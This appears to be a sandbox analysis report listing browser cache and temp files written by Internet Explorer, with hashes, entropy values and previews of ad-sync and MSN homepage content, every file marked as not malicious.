                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BBX2afX[1].png
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):879
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.684764008510229
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:nbwTOG/D9S9kmVgvOc0WL9P9juX7wlA3lrvfFRNa:bwTOk5S96vBB1jGwO3lzfxa
                                                                                                                                                                                                                                                                                  MD5:4AAAEC9CA6F651BE6C54B005E92EA928
                                                                                                                                                                                                                                                                                  SHA1:7296EC91AC01A8C127CD5B032A26BBC0B64E1451
                                                                                                                                                                                                                                                                                  SHA-256:90396DF05C94DD44E772B064FF77BC1E27B5025AB9C21CE748A717380D4620DD
                                                                                                                                                                                                                                                                                  SHA-512:09E0DE84657F2E520645C6BE20452C1779F6B492F67F88ABC7AB062D563C060AE51FC1E99579184C274AC3805214B6061AEC1730F72A6445AEBDB7E9F255755F
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BBXXVfm[1].png
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):842
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.712790381238881
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:03eeNY8QugsamcgusRa+4Sm81pdhTaXHir8L:0fNY8QuosS+4SmetsL
                                                                                                                                                                                                                                                                                  MD5:4F44C5854D2A321DE38DDA7580D99D2A
                                                                                                                                                                                                                                                                                  SHA1:637217CD4AB94060B945D364D6AD80BB173F41B7
                                                                                                                                                                                                                                                                                  SHA-256:77E9AF4EF4CEC6BAE0181D3173577BE0488DE8DB5FA71D2E5C7E05B5D5D27565
                                                                                                                                                                                                                                                                                  SHA-512:AC46863DDFE68156E7D76DDE08C299459B8C01CD8B2DB9DB5C3A4434D5CF34F6162556A29EBBCA401810ED5AD5F9BE57090E819DDED688EE7C36D179A1FBF3F6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\a8a064[1].gif
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 28 x 28
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16360
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.019403238999426
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:g2SEiHys4AeP/6ygbkUZp72i+ccys4AeP/6ygbkUZaoGBm:g2Tjs4Ae36kOpqi+c/s4Ae36kOaoGm
                                                                                                                                                                                                                                                                                  MD5:3CC1C4952C8DC47B76BE62DC076CE3EB
                                                                                                                                                                                                                                                                                  SHA1:65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979
                                                                                                                                                                                                                                                                                  SHA-256:10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
                                                                                                                                                                                                                                                                                  SHA-512:5CC1E6F9DACA9CEAB56BD2ECEEB7A523272A664FE8EE4BB0ADA5AF983BA98DBA8ECF3848390DF65DA929A954AC211FF87CE4DBFDC11F5DF0C6E3FEA8A5740EF7
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\checksync[1].htm
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):27135
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.33237304261757
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:pBNY7cAGcVXlblcqnzleZS57naMh6eg2f5ng1h7/V99qQWwY4RXrqt:p/r86qhbc2Rsh7/V/qQWwY4RXrqt
                                                                                                                                                                                                                                                                                  MD5:2C50DB6096770441093C246D675D2E89
                                                                                                                                                                                                                                                                                  SHA1:67C562A49E8C20A9C184FB158111B3DD4C3BD8FF
                                                                                                                                                                                                                                                                                  SHA-256:303267EF7E63A88E2D2F0856D259E796F2ED213D3DB4D4B5240B11915C6EEE4F
                                                                                                                                                                                                                                                                                  SHA-512:4B9F81C3995875D252D26FE69E6E60C649A52BA06734E693A1C90AD72F62987F44651B3F52878D4BC45ED8F342B5C160B527BDA0741539A3ED0BD0B2E3E9ED91
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":82,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"ZA","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","time":14,"cookie":"data-g","urls":[{"type":"img","url":"https:\/\/cm.g.doubleclick.net\/pixel?cs=1&google_nid=media&google_cm=1&google_hm=<encb64vsid>&google_sc=1"}],"pvid":77,"isBl":0,"g":1,"cocs":0},"bs":{"name":"bs","time":364,"cookie":"data-bs","urls":[{"type":"img","url":"https:\/\/x.bidswitch.net\/sync?ssp=medianet&gdpr=${GDPR}&gdpr_consent=${GDPR_CONSENT}&gdpr_pd=1"}],"pvid":109,"isBl":0,"g":1,"cocs":0},"vzn":{"name":"vzn","time":365,"cookie":"data-v","urls":[{"type":"img","url":"https:\/\/contextual.media.net\/cksync.php?cs=1&type=vzn&ovsid={{APID}}&redirect=https%3A%2F%2Fpixel.advertising.com%2Fups%2F58222%2Fsync%3F_origin%3D1%26uid%3D%24UID"}],"pvid":184,"isBl":0,"g":0,"cocs":0},"brx":{"name":"brx","time":365,"cook
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\de-ch[1].htm
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):428851
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.436909384555583
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:E/dJUMxx+IAkJ8B647/jnlIFMB3YS2q5tceLQYYmeS/yAZFP47eaXA+JxLf:E/dTOIcsFrqMeLQY7ebAZC7VbJh
                                                                                                                                                                                                                                                                                  MD5:73C6E1DB12AD08A88FE7358C56BDCE2E
                                                                                                                                                                                                                                                                                  SHA1:5C5B3641E102B353E869573679EE4BF8DD040E42
                                                                                                                                                                                                                                                                                  SHA-256:E447FA1388B75231161EA3B2CD577583C0C186A208571DDA22CE3150C769338A
                                                                                                                                                                                                                                                                                  SHA-512:9DCF0677F24ABC407A59BF2D8ECC80FDC584BE84BAD0114C1711631D122D6774A83452C0C4AE03C475EC702ECEF5AE3FC182336D8717F1C0BC76811A779C530C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview: <!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20211001_24816374;a:6fb5c0c6-9650-4348-95f2-8f7a413ac4e1;cn:9;az:{did:951b20c4cd6d42d29795c846b4755d88, rid: 9, sn: neurope-prod-hp, dt: 2021-09-29T17:58:24.1842677Z, bt: 2021-10-01T00:14:52.8166315Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2021-08-11 10:21:32Z;xdmap:2021-10-07 13:51:24Z;axd:;f:msnallexpusers,muidflt18cf,muidflt299cf,muidflt315cf,oneboxdhpcf,mmxandroid1cf,mmxios1cf,startedge1cf,platagyedge1cf,complianceedge1cf,pnehp1cf,moneyhp3cf,bingcollabhp1cf,pnehz2cf,pnehz3cf,compliancehz1cf,article4cf,onetrustpoplive,anaheim1cf,1s-bing-news,vebudumu04302020,bbh20200521msn,msnsports2cf,msnsports4cf,weather2cf,1s-br30min,btrecrow1,1s-winauthservice,weather8cf;userOptOut:false;userOptOutOptions:" data-js="{&quot;dp
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\de-ch[1].json
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):79097
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.337866393801766
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCgP5HVN/QZYUmftKCB:olLEJxa4CmdiuWlDxHga7B
                                                                                                                                                                                                                                                                                  MD5:408DDD452219F77E388108945DE7D0FE
                                                                                                                                                                                                                                                                                  SHA1:C34BAE1E2EBD5867CB735A5C9573E08C4787E8E7
                                                                                                                                                                                                                                                                                  SHA-256:197C124AD4B7DD42D6628B9BEFD54226CCDCD631ECFAEE6FB857195835F3B385
                                                                                                                                                                                                                                                                                  SHA-512:17B4CF649A4EAE86A6A38ABA535CAF0AEFB318D06765729053FDE4CD2EFEE7C13097286D0B8595435D0EB62EF09182A9A10CFEE2E71B72B74A6566A2697EAB1B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview: {"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAll
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\favicon[1].ico
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 16x16, 16 colors, 32x32, 16 colors
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1078
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.240940859118772
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:etFEh9HYflvlNl/AXll1pe/WNN00000000000000000000000000000000000001:QNtY6+lKY6
                                                                                                                                                                                                                                                                                  MD5:4123CE1E1732F202F60292941FF1487D
                                                                                                                                                                                                                                                                                  SHA1:9F12B11BDE582DAE37CE8C160537D919C561C464
                                                                                                                                                                                                                                                                                  SHA-256:D961B08E4321250926DE6F79087594975FE20AD1518DE8F91EB711AF5D1A6EF8
                                                                                                                                                                                                                                                                                  SHA-512:11B24C2E622C408E4774FAE120B719A21A0B2ACFA53230126C35AD6CA57D33D4DE79CBE11D296CFBDE9613CAA03D66B721BD20CF4EE030CF75F5A1FD8A286DA9
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\http___cdn.taboola.com_libtrc_static_thumbnails_171f8b8d6097fca0bfa9b18571e0f954[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):11572
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.894824371630134
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:qUtUHfHDqeI0q/1gvw3N3pIXJg6n9BenljBv4a8IZvmtUrY9/8F/pEIezP8JBrrN:qUtgLo0gHd3pIXa6nWl1gIgtUrkUFhEK
                                                                                                                                                                                                                                                                                  MD5:C5B7AB143A42CDF3600CFB874FC63354
                                                                                                                                                                                                                                                                                  SHA1:158CB91461BB637E7B8B7F6953D427BF3E72A172
                                                                                                                                                                                                                                                                                  SHA-256:31D78A209BCF6ED10E83C1A002680F0923B6BA9C8394CBC1CA1AC8F245439BA3
                                                                                                                                                                                                                                                                                  SHA-512:9AA5385366BC3913EB4B674E9F5540354CFFC8FA51FB22CD2AFFE62480A08991387605ABCA6E85091A5B5952A20DD5AE9F74F86CE7DAE596923B4937D0565D5D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\jquery-2.1.1.min[1].js
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):84249
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.369991369254365
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
                                                                                                                                                                                                                                                                                  MD5:9A094379D98C6458D480AD5A51C4AA27
                                                                                                                                                                                                                                                                                  SHA1:3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
                                                                                                                                                                                                                                                                                  SHA-256:B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
                                                                                                                                                                                                                                                                                  SHA-512:4BBB1CCB1C9712ACE14220D79A16CAD01B56A4175A0DD837A90CA4D6EC262EBF0FC20E6FA1E19DB593F3D593DDD90CFDFFE492EF17A356A1756F27F90376B650
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\medianet[1].htm
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):410910
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.48696512542413
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6144:zAikYqP1vG2jnmuynGJ8nKM03VCuPbe2JpJzzYmS:c1vFjKnGJ8KMGxTxYmS
                                                                                                                                                                                                                                                                                  MD5:1D6D11CB347263E23048972FE9150281
                                                                                                                                                                                                                                                                                  SHA1:1CDB76AD912C5BFB8A8D1DA23A9C19E0D1625FBF
                                                                                                                                                                                                                                                                                  SHA-256:952D70671073A4FC7B1AC5F5F2B5C757D70B6D6E9A8265D39E81103818234B13
                                                                                                                                                                                                                                                                                  SHA-512:3B042D4B2AD5E7310204D774205C0240E4B756BEB80B1E67F44F8F06C7E0472C02E597B1FBCBB9FE7CE7A8E2E3602FC45C2E1C62340BAA0CCC6FE38A1B1DD9CD
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\medianet[2].htm
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):410910
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.4868855518693955
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6144:zUikYqP1vG2jnmuynGJ8nKM03VCuPbF2JpJzzYmS:Q1vFjKnGJ8KMGxToYmS
                                                                                                                                                                                                                                                                                  MD5:F74DEB4DF639EAF7399111010A7182CF
                                                                                                                                                                                                                                                                                  SHA1:CAE6B2734066E07ADA1B7705E37A9D6D3DDEF3E3
                                                                                                                                                                                                                                                                                  SHA-256:84DB6BECF064AFFE1B39C7EF73C04334BFB5B495D9D2F6F5D689EAAE4808BEFD
                                                                                                                                                                                                                                                                                  SHA-512:8AD249BB9ADCDD265F1266D8B50A3AA6A770930CC007745A35DA784A38DD020E7CF30581262C7B052CD6BBAFE4FAE86D21DE214E3EBB17C2DB0F7DCB6DD32685
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\otFlat[2].json
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):12282
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.246783630735545
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:SZ1Nfybp4gtNs5FYdGDaRBYw6Q3OEB+q5OdjM/w4lYLp5bMqEb5PenUpoQuQJYQj:WNejbnNP85csXfn/BoH6iAHyPtJJAk
                                                                                                                                                                                                                                                                                  MD5:A7049025D23AEC458F406F190D31D68C
                                                                                                                                                                                                                                                                                  SHA1:450BC57E9C44FB45AD7DC826EB523E85B9E05944
                                                                                                                                                                                                                                                                                  SHA-256:101077328E77440ADEE7E27FC9A0A78DEB3EA880426DFFFDA70237CE413388A5
                                                                                                                                                                                                                                                                                  SHA-512:EFBEFAF0D02828F7DBD070317BFDF442CAE516011D596319AE0AF90FC4C4BD9FF945AB6E6E0FF9C737D54E05855414386492D95ABFC610E7DE2E99725CB1A906
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF089A6B92B8B468A8.TMP
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40145
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.6701756284503325
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:kBqoxKAuqR+8aAhKYULj0RDULj0R/Lj0R4:kBqoxKAuqR+8aAhKYUiDUi/i4
                                                                                                                                                                                                                                                                                  MD5:D10B58FB2B6CC42B14F0CAA6109D35D9
                                                                                                                                                                                                                                                                                  SHA1:7C4DD9B67385608F680AA598C73B861052F46364
                                                                                                                                                                                                                                                                                  SHA-256:99640F412051958EB30C72A3C6E8577787BE272018E2CA64413679783A9B503A
                                                                                                                                                                                                                                                                                  SHA-512:99189539CB976BB1960C2D2D7EC8A55EBD148F613219958409619F78AEB8A9745CDC92D9F7213F49DB16E9A392AB579A009C5B9D8ECC3F95447BCA1F4B594FEB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF3C0DFDDDFC29F1F0.TMP
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):206905
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.188827823757322
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:BZ/2Bfc/mu5kgTzXtOZ/2Bfcgmu5kgTzXt:os
                                                                                                                                                                                                                                                                                  MD5:869692B8C38793BF86553770719420A6
                                                                                                                                                                                                                                                                                  SHA1:07863CED17458E87F3812F43DB819BF2452F3EDC
                                                                                                                                                                                                                                                                                  SHA-256:A947B7DE4263C072911F49633622C57F6F410CB407AC001DFFD4CBD353D2C64A
                                                                                                                                                                                                                                                                                  SHA-512:F72DD03CCFB83EFF5786C252C2ABDCB1B93CC320E25C908F008E9ED0EC60E1A0FE72C65A03635D05D55AED70A55524DAE061261290370080EEBD714BDEFB8EC6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DFAFF8881E6374BF6C.TMP
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40145
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.6726419762098381
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:kBqoxKAuqR+djBgDpUtE+dmUtE+dytE+dP:I+q+R+d
                                                                                                                                                                                                                                                                                  MD5:9005A95824951F329518946B184A9060
                                                                                                                                                                                                                                                                                  SHA1:EB5C50650C2C312598B23B9E88D73DB3F5891B0E
                                                                                                                                                                                                                                                                                  SHA-256:E0EFCF10C99E81F34A01EC86CA433304B48124DCF15790BD6443C12CE1E557D3
                                                                                                                                                                                                                                                                                  SHA-512:3198A8FEFC69562052C25C03AA2CC4F138853D07686BFC5F729C9FBD0B99C2AF66581110CEF6880A116DFAFC5CA1DA8153F88062BAA1E2B0A40BACB1E950D9EC
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DFBF4FFB19552D8CDC.TMP
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40081
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.6589262817099075
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:kBqoxKAuqR+1bZILylTvRBDiPBlTvRBDiPOlTvRBDiPL:kBqoxKAuqR+1bZILypOppOmpOj
                                                                                                                                                                                                                                                                                  MD5:157E218DDDB0759510916DD5507BA3F4
                                                                                                                                                                                                                                                                                  SHA1:283C064763F0ED9F8D687F7676A94A48F340B579
                                                                                                                                                                                                                                                                                  SHA-256:CF9371762CC265E0E1E00F36E257B8327B3AD3806A34617E1789BBA6A78EAA42
                                                                                                                                                                                                                                                                                  SHA-512:AA69FA7C69604B65DF125E70D45EFFD4000688E50656F7637180CA0D65150F80F90809B91825DCEAA5D3E7C365E0346BEBC372746E8CD85D1A66AC0EDEDE00E7
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DFCE6F4D6F07D43360.TMP
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):29745
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.2920107282763179
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laAC9laAC9lrz:kBqoxxJhHWSVSEabeQ2y
                                                                                                                                                                                                                                                                                  MD5:CE909A43525B3843C907DCBE55E9D7DD
                                                                                                                                                                                                                                                                                  SHA1:8B6E53CCBAAB132FF8100ECB696282F011402047
                                                                                                                                                                                                                                                                                  SHA-256:540A8B39EAF1EF9CF341697FC4CDABBEBDED17B16321398C539639FD17EE1602
                                                                                                                                                                                                                                                                                  SHA-512:027F1DF5288441E3BFF63ABABD90521E2A72DC20FFAC545E0F180483761229D13254375ADA525D3C5155C1BAC6602117B24617A160C4B9D21C30721B9DF17446
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DFD54DA9B6AE4A4ED1.TMP
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):14389
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.177619819064975
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9lou9loe9lWtmxm/hN61r/7N1A1ON6111ypt1Oh166pEhEM:kBqoIp/As/erTQSe/Sc6CYjRKugDddCn
                                                                                                                                                                                                                                                                                  MD5:90ED921D6119706D2E73DAAE37137388
                                                                                                                                                                                                                                                                                  SHA1:C8EEF38600EB027B5708951DAEAF024DA73A3B3F
                                                                                                                                                                                                                                                                                  SHA-256:2EB0B2A8BF64388C5178ED3FD6A5BA7A950EE6709E2A5D83E527CC8DCFB0B143
                                                                                                                                                                                                                                                                                  SHA-512:91A1709C66678C5B0885D252D5CBAB4418B5EECD8C467B867C7E2E2B67363C6A7C510B61ABB7A863617A3607FD7EAA2F1E2FA991BFD683052DDB4027BB52F8C1
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DFF3589949295E4D6F.TMP
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40145
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.6709723692833666
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:kBqoxKAuqR+EiIZCgUo3FczUo3Fcvo3Fco:kBqoxKAuqR+EiIZCgU6cU6M65
                                                                                                                                                                                                                                                                                  MD5:12D730B6E2F7F0CFE55709E9F52E1EC6
                                                                                                                                                                                                                                                                                  SHA1:4B33D6037E10923274B941B044ECAE09A1C256A1
                                                                                                                                                                                                                                                                                  SHA-256:BA2C09AD339D7C7CD75EAAEF7159DC681348752C294822CB06F2562D0FC3E9DD
                                                                                                                                                                                                                                                                                  SHA-512:15F4886F3B49396A2AAC5DBC97EC9F0AF8EEB94E9BFC6093DDDC5B38CE33842CFE73FA6F69AB232CF69EF29D94E21441DD3A2B3236BA143E1EA82F5482F39AC8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-ms (copy)
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):5149
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.1729259632534914
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:jdiwPRfI9C9GrIoClyAsASF0diwPRfI9h683GrIoClyAczTdiwPRfI9x9GrIoClR:BPRfL9SGyAJTPRfo3SGyAGPRfc9SGyAf
                                                                                                                                                                                                                                                                                  MD5:0359DFE39C0A15ACE4F9E8A86C9DA83F
